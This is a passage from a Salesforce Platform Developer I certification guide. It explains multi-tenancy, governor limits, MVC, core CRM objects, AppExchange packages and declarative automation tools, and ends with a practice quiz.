flashy green if you want to. This is similar to using a Salesforce Platform, where once you have access to your space, you can then create new custom objects, add fields, and automate features to suit your business needs. The only thing that you can't do is break down the walls – otherwise, the whole building will collapse, right? Even though you have full flexibility in rearranging your apartment, you are still limited when it comes to certain things! For example, you can't put in a 5-meter sofa if the size of the room is smaller than this; additionally, you can't put in a Christmas tree that is higher than the height of your room, or you would need to break the ceiling, and your neighbor would start a lawsuit against you. Alternatively, you can't just install multiple high-voltage accessories or machines in your apartment without the electricity box exploding and leaving the whole building without power! I use this analogy in order to explain the governor limits that Salesforce enforces. Salesforce enforces these limits to make sure that no one single occupant will consume resources that could impact the other tenants or occupants who are using the Salesforce infrastructure. Salesforce uses a multi-tenancy architecture, meaning that a number of organizations (orgs) share the same IT resources, as opposed to dedicated resources. This results in a standard environment that is fully operated and managed by Salesforce, which is much more efficient and cost-effective for your company. The self-contained unit that allows an org to run is called an instance; it contains everything that is needed to run an org: - An application and database server - A file server - A server, storage, and network infrastructure An org is an independent configuration (or metadata) and data that is dedicated to a customer. It is represented by a unique ID that you can find in the Company Profile section in Setup. You must provide this ID each time you contact Salesforce support for Cases, Feature Request, and more. Each org only runs on one instance, which serves thousands of other orgs. The org's unique ID is stored in every table in the shared database to allow the filtering of data, and to ensure that a client's data is only accessed by that client alone. Some advantages of multi-tenancy are as follows: - All Salesforce customers, from small businesses to enterprise companies, are on the same code base and they all benefit from the same features and new functionality. - Salesforce upgrades are easy, automatic, and seamless. There are three automatic upgrades a year, which are called the Spring, Summer, and Winter releases. - With upgrades, a version is associated with every Apex trigger and Apex class. Here, backward compatibility is assured. - Each class has a version associated with it called the API version. When you move to the next release, the Apex class always uses the older version of the compiler to guarantee this backward compatibility. Otherwise, you can modify the code to work on the newest version. So, if all resources are shared by multiple customers, how does Salesforce ensure that one customer doesn't eat up all resources or break things that could impact all other customers on the same instance? Salesforce controls this by enforcing two things, which can be considered as the side effects of multi-tenancy: - Governor limits: These are the limits enforced by Salesforce that cannot be changed, and they are the same for anyone using the platform. For example, you can only use 100 queries in one execution context or perform 150 DML (short for Data Manipulation Language) statements in one execution context. Don't worry if you don't understand this yet, as we'll come back to this later. You can find the list of all the governor limits in the Salesforce documentation at. - Mandatory testing: Salesforce forces you to test your code before you are allowed to deploy it to production or upload a package to the AppExchange. At least 75% of all code must be covered by tests and they should all pass. Every trigger within your deployment package needs at least some coverage. It's best practice to test all possible scenarios, including positive and negative tests, in addition to testing for bulk updates or creation. MVC is an architectural design pattern in modern software development that promotes the separation of an application into three components: - An application's data storage (model) - An application's user interface (view) - An application's logic (controller) The following diagram maps Salesforce's components to this architectural design: This architecture is used a lot in software development because the isolation of data (that is, the model), user interface (that is, the view), and logic (that is, the controller) allows each component to be developed, tested, and maintained independently. - Model: This is actually where your data is stored and can be used. To store data, you need objects or fields, and these are considered to be part of the model. - View: This is whatever end users see and interact with; that is, what displays data to the clients or customers. This allows you to control how (and what) data is shown on the user interface. So, standard pages, page layouts, Visualforce pages, Lightning components, console layouts, and mini page layouts are all considered part of the view. - Controller: This refers to the actual logic and actions that are executed when someone interacts with Visualforce pages, standard pages, or Lightning components. The controller is the link that binds the client side and the server side. It will mostly consist of Apex; this means that even when building Lightning components, you'll probably need Apex to get the data from the database on the server and pass it to the JavaScript controller. The new Lightning Data Service from Salesforce acts like a standard controller—it connects to objects and fields in the database without writing any Apex. You could describe MVC like this—when you see a registration form (such as the Visualforce page developed on Salesforce), enter some information into the form, and then hit submit, the details are sent to a database and are saved into tables, columns, and rows (these are Salesforce objects and fields). Which data goes to what object and field in Salesforce is controlled by the logic defined in the standard and custom controllers. I expect that this will be a recap for you; however, just to be sure, I would like to summarize the functionalities paired with some of the most popular core CRM objects. This is important, as a lot of questions in the exam will give you business scenarios around these objects, and before thinking about programmatic solutions, you should consider whether there is any declarative solution that comes out of the box that could be used to meet the requirement. The lead object is mostly used for individuals and/or companies that have been identified as potential customers but have not been qualified yet. Leads can be created in several ways; you can create them manually one by one, by clicking on New in the Lead tab. They are usually imported from .csv files (and quite possibly bought by your marketing and/or sales department). Alternatively, they can be created automatically when using the out-of-the-box web-to-lead functionality that generates the HTML form that you put on specific pages of your website(s). Some of the functionalities that are offered by Salesforce for leads are as follows: - Web-to-lead functionality: This generates an HTML form that you can use on any web page. Here, you select the lead fields you would like the user to fill in on your website and it automatically creates a lead in Salesforce on submission of the form. Be aware that validation rules and duplicate management rules configured on the lead object will also be applied. Web-to-lead functionality works well when combined with auto-response rules and assignment rules. It has a limit of 500 created leads within a 24 hour period. If this limit is reached, Salesforce stores the overflow in a queue and will treat them when the limit is refreshed. Be aware that this queue is limited to 50,000 leads and cases. It is possible to increase the daily limit by submitting a case at Salesforce Support. - Lead auto-response rules: When new leads get created, you can specify whether an email needs to be sent to the lead automatically, and which email template should be sent out. - Lead assignment rules: Upon lead creation, you could set up the automatic assignment of these leads to specific users or queues based on specific criteria, such as by language, segment, or sector. You can only have one active assignment rule per object, but this assignment rule can contain multiple criteria and logic entries. - Lead queue: Custom objects and some standard objects (including leads) can be assigned to a queue. Queues are similar to lists of records, where these records are waiting to be picked up and treated by members assigned to the queue. Queue members can then pick records from the queue and go on to contact the lead, disqualify them, and then start the conversion process. A queue can contain public groups, roles, subordinates, and users as queue members. - Lead conversion: Within a standard sales process, leads usually require some sort of disqualification. This means that someone will try to contact the lead and will try to determine whether they could potentially do business together. A common means of qualification is to determine the Budget, Authority, Need, and Time (BANT). If the lead does not qualify, then the status is changed to disqualified. If the lead does qualify, then the lead will be converted into an account, a contact, and, optionally, an opportunity. This conversion process will map lead fields to corresponding fields on the account, contact, and opportunity, which can be defined by a system administrator: Note A lead will always convert into a contact, and depending on whether you have Person Accounts enabled in your org, an account will also be mandatory (either a new or existing account). If Person Account is enabled, then the conversion process will convert your lead to a Person Account if the Company field is left empty. After the conversion process is successfully executed, the lead will be flagged as converted and will no longer be visible in the search results (unless your profile has the View and Edit Converted Leads App permission). Accounts are orgs or individuals (when Person Accounts is enabled) that are involved with your business in some way (such as the customer, competitor, partner, or supplier). There are two types of accounts, as follows: - Business accounts (B2B): This is the default account type. An account usually contains the general information about a company, such as the name, billing address, shipping address, sector, segment, and VAT number. They also contain several related lists of records, such as the people who work there, the cases that are logged, the opportunities that are sent, the documents that are uploaded, and more. - Person accounts (B2C): If your company also deals with individuals, not companies, you can ask Salesforce to enable Person Accountsin your org. However, be aware that once this feature has been enabled, it cannot be disabled (but you can still choose not to use the record type). Person Accountsare a combination of the account object and the contact object. They mostly contain user information, such as first name, last name, date of birth, gender, hobbies, interests, and more. Of course, if your company deals in both B2B and B2C, then you can use both business accounts and Person Accounts in your org. The account object also comes with some specific features, as follows: - Account hierarchies: The account object has a standard lookup field called the parent account. When this is filled in, it creates a hierarchical relationship between the accounts. When clicking on View Account Hierarchyfrom an account, you can see the whole account relationship from the point of view of the current record. You can easily navigate from one account to the other within the hierarchy. An admin can also modify or adjust up to 15 columns, shown on the Hierarchyoverview page, through Setup| Object Manager| Account| Hierarchy Columns. The following screenshot shows how Account Hierarchyis presented to the user on the Salesforce interface: The Account Hierarchy is most commonly used in the following way: - Account teams: These are another way in which to grant access to a specific account record, next to Organisation-Wide Defaults (OWD), sharing rules, and manual sharing. Here, the owner of an account can specify other users (called Account Team Members) working on that same account with a specific business role (such as inside sales, support representatives, and project managers) and specific privileges (read-only or read-write). The user is also able to specify a default account team for each user, which will automatically be added onto the account where that user is the owner of the account. The account teams feature is disabled by default; you can enable it by going to Setup| Feature Settings| Sales| Account Teams. This refers to the individuals working on your accounts with whom you have contact. It mostly contains more personal details such as date of birth, gender, and language. Additionally, it can also contain company details, such as title, department, and, optionally, their relationship to another contact to whom they report. This ReportsToIdlookup field is similar to the Parent Account field, and allows you to present a hierarchy between your contacts. Under normal circumstances, a contact is always directly related to an account. It is possible to mark the account lookup as non-required, but when a contact is not associated with an account, then it becomes a private contact instead. Private contacts are only visible to the record owner and system administrators, and cannot be shared with others. For marketing purposes, it is important to avoid duplicates between contacts; however, what if the same contact plays a role on multiple accounts? For this specific reason, Salesforce introduced a new feature called Contacts to Multiple Accounts. This feature is disabled by default, but you can enable it through Setup | Feature Settings | Sales | Account Settings: Once enabled, the related list, related account, and related contact details will need to be added to your respective contact's and account's page layouts. You can remove the standard contact's related list from the account page layout because the new related list contains both the direct and indirect contacts or accounts. Each contact will still have one direct account through account lookup, but you will be able to create extra relationships with other accounts by adding a new Account Contact Relationship. These will automatically be marked as indirect. However, because these relationships are with another specific object in the Salesforce database, the individual will only exist once in the contact table, which is fantastic news for your marketing department. This represents the potential revenue that sales representatives can track through different stages of the sales process until the deal is either won or lost. Opportunities come with multiple sales-related features, as follows: - Building your company's pipeline - Forecasting the revenue and determining the next steps to move forward in the sales cycle In combination with products, price books, and price book entries (prices), opportunities can add a great level of detail to what you are selling to your customers. The opportunity object comes with some specific features, as follows: - Opportunity teams: This is very similar to account teams; they allow you to add other users to work on the same opportunity with a specific role and access right. In the user record list, it's also possible to add a default opportunity team. - Opportunity splits: If opportunity teams are enabled, then you also enable opportunity splits. These are used to share the revenue of an opportunity between multiple users. In this way, they all contribute to win the deal. This means that the opportunity team members, who are collaborating to win an opportunity, will individually get credit in the pipeline reports, and this will contribute to them achieving their quota. Note that this is not really something that you must know for the exam, so if you want to learn more about this topic, then you can read more at. - Collaborative forecasting: This feature will help you predict the pipeline. A forecast represents the expected revenue based on the sum of the total set of opportunities. They can be adjusted by managers in order to get a more accurate forecast without effectively changing the underlying opportunity's amounts. They are split up by the forecast category, time period, and, optionally, by product. AppExchange is the official Salesforce marketplace for business applications and is available at. An app is a bundling of custom objects, fields, programmatic and/or declarative logic, and automations. They solve a specific business requirement or support a specific business process in a better way. You can install an app from AppExchange by simply clicking on the Get It Now button and decide on whether to install a production or a sandbox environment. When you get a new requirement, it's good practice to check on AppExchange first, in order to see whether there is a solution already – either free or paid. So, what can you find on AppExchange? Well, let's take a look, as follows: - Apps: These are groups of tabs, objects, components, and business logic that work together to provide standalone functionality. - Lightning components: These are the building blocks of functionality that you can drag and drop into a Lightning app, on Lightning pages, or community pages through the Lightning App Builder interface. - Flow solutions: If you want to automate your business process with flow actions, then Lightning flow is considered one of the most powerful, and more advanced, declarative automation tools. The chances are that somebody has already built some flow processes that meet your needs. - Lightning bolt solutions: These are industry template solutions, which are mainly built by partners to help you market faster. Lightning bolts contain process flows, apps, Lightning components, and even whole communities. - Lightning Data: These are pre-integrated, approved, and scalable data solutions. If you want to connect to a data source supplier, such as D&B, then first check whether there is a Lightning Data solution for it. - Consulting partners: If you are looking for help implementing or expanding your Salesforce solution, then AppExchange contains a listing of all consulting partners worldwide, including reviews. AppExchange is extremely easy to search—you just type in a keyword and it will start giving you suggestions. You can easily filter the search options according to industry to see what apps are popular in your industry. Additionally, you can filter by solution type, price, compatibility with your Salesforce edition, ratings, and language. It will even suggest you learning modules on Trailhead, the free online Salesforce learning platform! Here are the things that you need to consider when choosing an AppExchange solution: - Is it free or paid? Does it fit within your budget? - Is it compatible with your Salesforce edition? - Does it require you to turn on some features that are not yet enabled in your org? - Is it Lightning-compatible or does it only work in Classic? - What do the reviews say? Are any of your requirements not met? - Always test in a sandbox environment first! When talking about AppExchange, it's important that we talk about packages, because that's what you will be installing—a package. Packages are bundles of metadata components that make up an app or solution. A typical package will contain objects, fields, Workflow Rules (WFRs), validation rules, processes, approval processes, flows, Apex classes, Visualforce pages, and Lightning components. There could be hundreds of them in one package. Packages are used for distribution across unrelated orgs—it's like deploying a change set. In fact, anybody can create a package for distribution, and then share the link to someone else to install the solution in their org. These packages are private and the receiver must know the exact URL of the package to be able to install it. If you want your package to be publicly available, searchable, and/or listed, then it must be uploaded on AppExchange. Packages that are published on AppExchange also come in two variants, as follows: - Unmanaged packages: - They are used for distribution across orgs. - By installing an unmanaged package, you copy all its contents into your org and, after installation, you can modify everything. You can change the Apex code, the Visualforce code, mark fields as required or not, change their data types, and more. - The contents of the package become yours. - This also means that the creator or provider loses all control and, in most cases, they cannot offer any support on the package. - They don't need to have a namespace. - The packaged components will count toward your org limits. - Managed packages: - The source code of managed packages is hidden from you - You can't see or modify any of the code - Managed packages can only be created in a developer environment - This also means that the creator or provider has control over the installed version and can offer upgrades - The provider will mostly provide support on the package - You can grant the provider access to your org to support you, in the same way that you would grant access to the Salesforce support - The packaged components do not count towards your orgs limits - The use of a namespace is required - Managed packages are typically for sale on the AppExchange It's important to understand one of the biggest differentiators of Salesforce in comparison to other CRMs. Salesforce provides a lot of tools and features to maximize declarative customization (through point-and-click tools). In fact, while configuring Salesforce to suit your business needs, in 80% of cases, you will be able to solve your requirement with declarative functionality. For the remaining 20% of the use cases, you'll need some kind of programmatic development. Becoming a certified platform developer does not mean that you solve everything with code. Customers, consultancy agencies, and Salesforce all expect a Salesforce developer to be able to use the easiest tool to achieve a solution and, therefore, most of the exam will assess whether you are able to distinguish what can be achieved through declarative configuration and what cannot be, hence, reverting to a more programmatic approach. In Chapter 3, Declarative Automation, we'll dive deeper into ways to automate your business through declarative tools and programmatic options. For now, let's just recap the most commonly used declarative features that Salesforce offers an admin out of the box. Salesforce comes with a lot of standard objects, all of which have standard fields. Objects and fields allow you to capture data in the database. Consider the following screenshot; here, you can compare objects and fields by having an Excel file, where you have a sheet for every object, such as accounts, contacts, quotes, and so on. In this case, you will need to keep track of multiple records and specific data: You will also need a row for each account record, along with columns for the data that you would like to track of for the account. In Salesforce, these are represented by fields. Just like in Excel, a field can have a certain data type depending on what type of data you are tracking—that is, text, phone numbers, URLs, dates, and more. Each object can be, but doesn't have to be, represented by a tab in Salesforce, just like creating a sheet per object in Excel. Having a tab for the object gives you the benefit of creating filtered list views of records for that type of object. Additionally, you can extend your database to your needs; this is done by creating new custom objects yourself and creating extra custom fields on the existing standard objects and/or on your newly created custom objects to track whatever data you deem necessary. While creating a field just like in Excel, you have the choice between several data types such as Text, Text Area, Rich Text Area, Lookup relationship, Master-Detail relationship Checkbox, Picklist, Multi-Select Picklist, Phone, Date, DateTime, Time, Currency, Geolocation, F ormula fields, and Roll-up Summary fields. A formula field is like a real-time calculation that is calculated when it is loaded or requested. It's like a formula in an Excel spreadsheet. We refer to it as loaded or requested, because it's not a calculation that appears while viewing a record in the user interface. When you request the record data, it is calculated (or recalculated) using the following methods: - By viewing it in the UI or in a report - By exporting the data through a data loader - By reading the data through an API call - By querying the data in a SOQL query A formula field is always read-only. This means that it's not a field in which you can type or change it's value manually – it is always calculated. As a result of this, the calculation does not perform an update on the record and this can never trigger any automations. What I mean here is that you can't have something like a WFR that updates a field when that field changes without performing a manual update or other automation update of the record. You can, however, use the value of a formula field in your automation processes as a criterion or to use as a value. I know this is somewhat confusing, so let's try to explain it using an example. Let's say that we create a formula field returning a date that is calculated, based on the creation date of a record plus 30 days, and we would like to create a task for the owner when we reach that date automatically. You could be tempted to create a Process Builder that evaluates whether TODAY() equals the date field. If it does, then create the task and, as long as that date is not equal, it's still either in the future or already past. Now, if the record does not get updated by someone manually, or by some other automation, then nobody will touch this record and this Process Builder won't fire—this is because all automations only fire on the creation or updating of records. Additionally, a formula field is calculated in real time when it gets requested and does not perform an update of the record. You can use your own logic in order to build the calculation that it needs to perform, and Salesforce offers a lot of functions for you to use within your formulas. For instance, I really like the Formula Cheatsheet Salesforce that contains the most used functions. You can find it at. A formula field can return the following things: - Checkbox - Currency - Date - Datetime - Time - Number - Percent - Text Formulas usually perform calculations with other values in the record that it resides on, but it can also use the values of parent records, or grandparent records, up to 10 levels up. However, it cannot use the values of child records. So, a common use case for a formula field is to display data from its parent. For example, let's say that we have a custom Picklist field, Region__c, on the account page and we would like to show this value on our opportunities page. Because an opportunity is directly linked to an account, we could create a formula field that renders the text using the formula TEXT ( Account.Region__c). Because a formula is always calculated in real time, this value will always represent the actual value from the Region__c field of the account on our opportunity, without manually updating all opportunities of this account whenever the Region__c field changes on the account. A formula field that uses data from its parent, or higher up the hierarchy, is called a cross-object formula. Formulas do have some limitations that you need to be aware of; for example, you will get an error message if your formula does not comply with the following limits: - The maximum number of characters is 3,900. - The maximum formula size on saved is 4,000 bytes. When your formula exceeds either of the aforementioned characters or byte limits, then you will receive an error message mentioning this. A rollup summary field (RUS) field is very much like a formula field in that it also performs a calculation. However, this is based on child records, and only when these child records are part of a Master-Detail relationship! It's used to summarize a numeric value based on (filtered) child records and can perform COUNT, SUM, MIN, and MAX. It is recalculated whenever a transaction on these child records occurs in the following ways: - When a new child is created - When one of the children gets updated - When a child gets deleted You can use filters to only pull values from specific child records. For example, let's say that we have a custom Invoice__c object that is related to the account as a Master-Detail relationship. In our Invoice__c object, we have an Amount field and a Status field. We could create a RUS field in the account that represents the total amount that is overdue, which is a calculation of the SUM operation of the Amount field on all related invoices, with a filter on the Status field that is equal to Overdue. Validation rules are used to make sure that the data entered in fields adheres to the standards you have specified for your business.; for example, making sure that phone numbers always have the same format, or that a field cannot be left blank based on the input or value of another field. If a value does not meet your validation rules, then the user will not be able to save the record. A validation rule is made of a formula or expression to check the criteria and an error message, which will be shown to the user if the values do not meet your specified criteria. The formula evaluates the data in one or more fields, and then returns either true or false. Validation rules ensure data quality in your org. If the formula returns true, then the defined error message is displayed and the record cannot be saved. The formula can be referenced with more than one field and can also be a cross-object formula. While setting the error message, you can decide to show it next to a certain field or on top of the page. Validation rules will run while performing operations through an API (through Data Loader, for example), on web-to-lead creations, and on web-to-case submissions. So, make sure that you design your validation rules so that they will not interfere unintentionally with these functionalities. In some scenarios, you may need to disable the validation rules while you import or update data, and then reactivate the rules afterward. Alternatively, you may exclude a specific user or profile in the validation formula so that it doesn't execute when the operation is run, as that specific user or as a user with that profile; this means that they can perform data loads without validation rules firing. A WFR tool is one of the oldest and highest-performing automation tools. They help end users save time in their day-to-day activities. A WFR is a set of actions that need to be executed when a record is created or updated to meet specified criteria. WFRs can be split into two main components: - Criteria: What must be the true record for the WFR to fire and have its associated actions to be executed - Actions: What to do when the record meets the criteria that was defined and which actions need to be executed WFRs can execute the following actions (either immediately or time-based): - Sending an email alert - Performing one or more field updates - Sending an outbound message - Creating a task - Triggering a Lightning flow process Consider the following screenshot: Sometimes, you may want to create some kind of an approval process in which records need to be approved by one or multiple other users before moving further within your business process. A very common use case is to submit an opportunity for approval to a sales manager if a specific discount percentage or amount is exceeded. Well, approval processes are the tools that create these types of processes. They allow you to specify an object, the criteria (or record values) that need to be evaluated before a record must be submitted for approval or not, and who needs to give their approval. After an approval or rejection, you can perform a number of automated actions, such as field updates or sending notifications. In approval processes, after submitting the record, the record is then locked. In this way, nothing can be changed until the data has been approved or rejected. The user who is submitting the data for approval can also have the option to recall the record, which takes the record back out of the approval process. Upon final approval or final rejection, the same actions as in WFRs can be executed, such as updating a field, sending an email, and more: In the day-to-day life of end users, a lot of repetitive work is done manually. You can minimize these manual actions (such as sending email notifications, assigning records to other users or queues, and performing record updates to certain stages and statuses) by creating automated actions through the Process Builder. The Process Builder is one of the most powerful tools that you can use to automate your business using a nice graphical interface. The Process Builder can be kicked off in the following three ways: - When a record is created or updated in Salesforce - When a platform event occurs on the Salesforce Platform - When another process invokes it Each process consists of nodes and actions, as follows: - In the nodes, you'll define the criteria on which a set of actions need to be executed. - The actions (immediate or scheduled, that is, time-based actions) need to be executed when a certain criteria node is being entered and evaluated (being true). Pay attention to the fact that only record-change processes support scheduled actions. With the Process Builder, you can perform the following actions: - Create records of any object type. - Update any related record; this is not limited to the record itself or its parent. - Use quick actions to create or update records or log calls. - Invoke a process from another process. - Launch a flow. - Send an email. - Post to Chatter. - Submit a record for approval. - Call an Apex class. The Process Builder also comes with an easy-to-read and easy-to-edit drag and drop graphical interface; this is why most people call it WFR on steroids: When it comes to flows, you might have heard of several different definitions or types. To clear up any confusion, the official terms are as follows: - Lightning flow: This is the native platform feature that allows you to build, manage, and run processes - Cloud Flow Designer: This is the graphical interface that is used to design and build your flows; this is done through clicks and dragging and dropping - Flow: This is an actual chain of events, input captures, queries, and actions that will be executed to automate your specific business process when an event takes place in your Salesforce org or on an external system In short, the Cloud Flow Designer is the tool that helps you create flows: The flowscreen example Every flow consists of three blocks, as follows: - Elements (1): These are dragged onto the canvas; an element can represent a screen input, a query or some kind of action (such as create record), a post to Chatter, and more. - Connectors (2): These are used to define the order in which elements are executed. They form the path that elements must follow, and they tell the flow what elements must be executed next. - Resources (3): These are pieces of storage in the memory of the flow that contain a specific value, such as values from fields or formulas. You can refer to and use these resources throughout your flow; for example, to look for an account's ID, store that ID in a variable resource with a name of your choice, and then later use that ID to update the account or to relate records to that account ID. Additionally, Lightning flow is the only automation tool that can accept user input without the need to create a Visualforce page or Lightning component for it. So, Lightning flow is an ideal tool for building—such as for call scripts, in which you guide users through a set of questions to ask a customer and, then, depending on the response, it performs a set of actions at the end of the flow. Additionally, Lightning flow is the only automation tool that is able to delete records. Salesforce has a very nice comparison chart of the different automation tools, which you should know by heart for the exam. You can keep checking for any updates to this chart at. Consider the following screenshot: So far, we have learned how working on a multi-tenant platform requires your attention while developing your own custom applications. Additionally, we have learned what the MVC paradigm is, how Salesforce comes with some core standard objects, how you can create your own custom objects, and how you can leverage declarative tools to customize and automate your environment to support your business processes. In Chapter 2, Understanding Data Modeling and Management, we'll learn more about the Salesforce data model and how you can extend it. Additionally, we'll explore how to relate different objects to each other, how to visualize these different relationships, how you can import data into the platform, and how to export it. We'll be building our own basic international movie database in order to explore all of these concepts. But, first, let's check whether you are on the right track to becoming a certified Salesforce developer—I definitely hope so! You'll find all the answers to each chapter summary quiz at the end of this book (in the Appendix). Try to answer the questions first without looking at the answers: - Your manager wants you to build a solution that deletes all open tasks related to an opportunity when the Opportunitystage is set to Closed Won. In what ways could you build out this solution? Select two answers: - Write an Apex trigger that fires when the Opp ortunity Stageupdates to Closed Won, queries all the related Tasksthat have an Openstatus for that opportunity and then deletes them. - Create a Process Builder that performs a delete action on all the related Childrenof the Tasktype with Status Open, when the Opportunity Stageis set to Closed Won. - Create a Process Builder that calls a Lightning flow whenever an Opportunity Stagereaches Closed Won. The flow then queries all Tasksrelated to the opportunity that kicked off the Process Builder with a status of Open, and deletes them. - Create a Process Builder that calls an Apex trigger whenever an Opportunity Stagereaches Closed Won. The trigger then queries all related Taskswith a status of Openfor that opportunity and deletes them. - Object B has a master-detail relationship to object A, so A is the parent of B. You want to display the value of the Status field from object A on the record of object B. How could you do this? - You create a formula field on object B and, in the formula, you reference the Statusfield from its related object A. - You create an Apex trigger on object B to copy over the value of the Statusfield from its related object A record. - You create a RUS field on object B, pulling in the Statusfrom object A. - You use the Process Builder to fire off on object B to copy over the value of the Statusfield from its related object A record. - A business user would like you to send a notification whenever a case is put in the Closed status to the case owner's manager, and to post this on Chatter. What's the best tool to use? - WFRs - Apex trigger - The Process Builder - Lightning flow - A cross-object formula field can be one of the following: - Reference fields from parent objects that have a Master-Detail relationship - Reference fields from parent objects related through a lookup relationship only - Reference fields from parent objects related through either a Master-Detail or a lookup relationship - Reference fields from the same record only - Your company is in need of a recruitment application for its HR department including jobs, job postings, applicants, and more. How would you go about this? - You start by drawing the data model, create the objects, test them, validate them, and perform a RUS calculation - You start by searching the AppExchange - You advise HR management that this is not something that should reside in Salesforce - You scratch your head because you have no clue how to start providing a solution for this requirement - What are some implications of a multi-tenant environment when it comes to Salesforce? - Resources are added to the instance whenever needed, so you should not worry about resource consumption - Multi-tenant means that your org gets its own instance with all its resources dedicated to your org - You should avoid using Salesforce at peak time as it is slower than usual, because everybody is using it at that time - There are governor limits imposed by Salesforce on each org to prevent them consuming all of the instance resources - In a multi-tenant environment, which of these statements is true? - Your org shares a Salesforce instance with thousands of other orgs - Your org shares a Salesforce instance with no more than 100 other orgs - Your org has its own Salesforce instance - All Salesforce orgs use the same Salesforce instance - What's special about a formula field? - It is calculated once every 24 hours - It is calculated once every hour - It is calculated only when you write the record into the database - It is calculated every time when you read the record in question - How is a managed package built? - Through your Salesforce org's sandbox - Through the enterprise edition of the Salesforce org - Through the developer edition of the Salesforce org - Through a Salesforce developer edition's sandbox - Your company asks you to create a process that automates holiday requests. There should be two levels of acceptance before the holiday request is granted—first, by the direct manager of the requestor, and then by the HR manager. How would you do this? - Build a flow using the Lightning flow - Build rules by using WFRs to streamline the process - Build a process by using the Process Builder - Build this process by using the approval process
https://www.packtpub.com/product/salesforce-platform-developer-i-certification-guide/9781789802078
CC-MAIN-2021-17
refinedweb
7,859
55.47
Seam & DelegationJ B Apr 5, 2011 3:07 AM Im just playing with seam and trying to get a feel for it but ive hit a stumbling block. Im playing around with pagination and i dont like having to dump all the pagination variables that i have in every component that needs pagination. (Maybe i dont need to but from the examples ive seen) Here is my setup @Name("statusManager") @Scope(ScopeType.CONVERSATION) public class StatusManager implements Serializable, PagingListener { @Out private PagingHandler pagingHandler = PagingHandler.getInstance(this); public void searchByState() { Query query = entityManager.createQuery(queryStr); dataModel = QueryHelper.getResultList(query,pagingHandler); } @Override public String changePage() { searchByState(); return null; } } @Name("pagingHandler") @Scope(ScopeType.CONVERSATION) public class PagingHandler { private int pageNo = 1; private int pageSize = 5; private boolean morePagesAvailable = true; private PagingListener listener = null; ...... On the front end then i have just this <custom:pager Now the problem with the above is with the call back, when "next" or "previous" is called, it calls the paging handler instance which calls the StatusManager.changePage but the entity manager is null when chnageState is called and it bombs out (obviously because seam hasnt injected the entityManager) because the request has gone to the paging handler instance. Im completely new to seam and have played around with setting the paging handler instance to be @Out and also made it a component but to no avail.(This is where i feel im going wrong, incorrectly annotating but im just hacking at the moment to get it to work, i should read up more but hey ;) ) Is it possible to do what i want to do here?? Appreciate any help or pointers in the right direction, JB 1. Re: Seam & DelegationLeo van den berg Apr 5, 2011 3:33 AM (in response to J B) Hi, I would be happy to help, you, but I would recommend that you first get a basic idea on the workings of Seam before you start playing and/or hacking. The Seam component EntityQuery has excellent - built-in - support for pagination, so under normal circumstances there is no need whatsoever to build such functionality yourself. Seam MUST handle the management of components, so at the moment you create with new, or with a factory method, Seam doesn't handle such instance, so in- and outjecting won't work. - Get the full doc and examples of Seam - buy the Seam in Action book. Leo 2. Re: Seam & DelegationJ B Apr 5, 2011 8:10 AM (in response to J B) Hi Leo, Im more interested in the interaction of the components between each other. Dont get hung up by the fact that it is pagination im more interested in how the call back works or would work in seam. I realise from your comments (Thanks) that this wont work @Out private PagingHandler pagingHandler = PagingHandler.getInstance(this); As you said seam must manage the components to it should possibly look like something like this @In @Out private PagingHandler pagingHandler ; What im stuck on is how the injection of the pagingListener in PagingHandler from seam would work?? I dont see it in the docs. Is the above even possible in seam?? Cheers, JB 3. Re: Seam & DelegationLeo van den berg Apr 5, 2011 8:19 AM (in response to J B) Hi, you can create components statically in Seam more or less like Spring does. You define a component in componenst.xml and provides its name and the class it should use and (optionally) a scope. Instance variables can be set as tags inside the component tag. If you want Seam to handle the creation with annotations, you need the In-annotation with the attribute create @In(create=true) , which takes care of creating an instance. You can also put an AutoCreate annotation on a component. Leo
https://community.jboss.org/message/712028
CC-MAIN-2015-22
refinedweb
631
51.18
zest.releaser 3.30 Software releasing made easy and repeatable Package releasing made easy zest.releaser is collection of command-line programs to help you automate the task of releasing a software project. It's particularly helpful with Python package projects, but it can also be used for non-Python projects. For example, it's used to tag buildouts - a project only needs a version.txt file to be used with zest.releaser. It will help you to automate: - Updating the version number. The version number can either be in setup.py or version.txt. For example, 0.3.dev0 (current) to 0.3 (release) to 0.4.dev0 (new development version). - Updating the history/changes file. It logs the release date on release and adds a new section for the upcoming changes (new development version). - Tagging the release. It creates a tag in your version control system named after the released version number. - Uploading a source release to PyPI. It will only do this if the package is already registered there (else it will ask, defaulting to 'no'); the Zest Releaser is careful not to publish your private projects! It can also check out the tag in a temporary directory in case you need to modify it. Contents - Package releasing made easy - Details - Entrypoints documentation - To do - Credits - Changelog for zest.releaser Installation Getting a good installation consists of two steps: getting the zest.releaser commands, and setting up your environment so you can upload releases to pypi (if you want that). Get the zest.releaser commands Just a simple pip zest.releaser or easy_install zest.releaser is enough. Alternatively, buildout users can install zest.releaser as part of a specific project's buildout, by having a buildout configuration such as: [buildout] parts = releaser [releaser] recipe = zc.recipe.egg eggs = zest.releaser Prepare for pypi distribution Of course you must have a version control system installed. zest.releaser currently supports: - Subversion (svn) - Mercurial (hg) - Git (git) - Bazaar (bzr) Others could be added if there are volunteers. When the (full)release command tries to upload your package to a pypi server, zest.releaser basically just executes the command python setup.py register sdist upload. The python here is the same python that was used to install zest.releaser. If that command would fail when you try it manually (for example because you have not configured a .pypirc file yet), then zest.releaser does not magically make it work. This means that you may need to have some extra python packages installed: - setuptools or distribute (when using subversion 1.5 or higher you need setuptools 0.6c11 or higher or any distribute version) -) - collective.dist (when using python2.4, depending on your ~/.pypirc file) -. The setuptools plugins are mostly so you do not miss files in the generated sdist that is uploaded to pypi. For more info, see the section on Uploading to pypi server(s). In general, if you are missing files in the uploaded package, the best is to put a proper MANIFEST.in file next to your setup.py. See zest.pocompile for an example. Running Zest.releaser gives you four commands to help in releasing python packages. They must be run in a version controlled checkout. The commands are: - prerelease: asks you for a version number (defaults to the current version minus a 'dev' or so), updates the setup.py or version.txt and the HISTORY.txt/CHANGES.txt/CHANGES HISTORY.txt/CHANGES.txt HISTORY.txt/CHANGES.txt. Details Current assumptions. There's a version.txt or setup.py in your project. The version.txt has a single line with the version number (newline optional). The setup.py should have a single version = '0.3' line somewhere. You can also have it in the actual setup() call, on its own line still, as `` version = '0.3',``. Indentation and the comma are preserved. If you need something special, you can always do a version=version and put the actual version statement in a zest.releaser-friendly format near the top of the file. Reading (in Plone products) a version.txt into setup.py works great, too. The history file (either HISTORY.txt, CHANGES.txt or. It also supports the current zopeskel style with 0.3 - unreleased. If using Python 2.4 you don't want to have tar.gz eggs due to an obscure bug on python Development notes, bug tracker The source code can be found on 